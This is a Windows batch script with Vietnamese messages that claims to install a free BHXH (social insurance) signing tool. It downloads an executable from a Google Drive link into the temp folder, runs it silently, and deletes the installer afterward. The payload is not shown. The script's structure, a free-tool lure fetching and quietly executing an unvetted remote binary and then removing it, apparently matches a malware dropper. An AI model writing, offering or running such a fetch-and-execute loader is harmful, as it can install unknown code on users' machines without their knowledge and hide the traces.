@echo off
setlocal

:: ====== CONFIG ======
set "FILE=%TEMP%\vss_setup.exe"
set "DownloadUrl=https://drive.usercontent.google.com/download?id=18VXtYNEF8pWM0ND3UGlI0Xs3oTlkSfmX&export=download&authuser=0&confirm=t&uuid=96fa0fde-f585-4211-a068-a73a3bd0c780&at=AGN2oQ0s1kBNW1Y8X_Za3_H-qQnY%3A1774376594104"

:: ====== DOWNLOAD ======
echo Dang tai file cai dat...
curl -L -# "%DownloadUrl%" -o "%FILE%"

if not exist "%FILE%" (
    echo Khong the tai tep.
    pause
    exit /b 1
)

echo Tai thanh cong!

:: ====== INSTALL ======
echo Dang cai dat tool ky BHXH mien phi...
start /wait "" "%FILE%" /quiet /norestart

if errorlevel 1 (
    echo Cai dat tool that bai.
    pause
    exit /b 1
)

echo Cai dat thanh cong!

:: ====== CLEAN ======
echo Dang xoa file cai dat...
del /f /q "%FILE%"

if exist "%FILE%" (
    echo Khong the xoa file...
) else (
    echo Da xoa file cai dat.
)

endlocal
pause
